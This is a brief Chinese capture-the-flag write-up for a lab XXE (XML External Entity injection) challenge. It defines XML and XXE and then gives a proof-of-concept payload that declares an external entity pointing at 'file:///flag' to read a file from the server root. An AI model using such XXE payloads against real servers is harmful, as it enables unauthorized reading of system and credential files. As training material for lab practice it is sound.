XML外部实体注⼊安鸾Writeup
XML外部实体注⼊01
XML外部实体注⼊,简称XXE
网络上xml是什么意思⽹站URL:
提⽰:flag⽂件在服务器根⽬录下,⽂件名为flag
XML⽤于标记电⼦⽂件使其具有结构性的标记语⾔,可以⽤来标记数据、定义数据类型,是⼀种允许⽤户对⾃⼰的标记语⾔进⾏定义的源语⾔。XML⽂档结构包括XML声明、DTD⽂档类型定义(可选)、⽂档元素。
什么是XXE
XXE(XML External Entity Injection) 全称为 XML 外部实体注⼊
扩展阅读:
话不多说直接上poc
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///flag">  ]>
<user><username>&xxe;</username><password>admin</password></user>

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。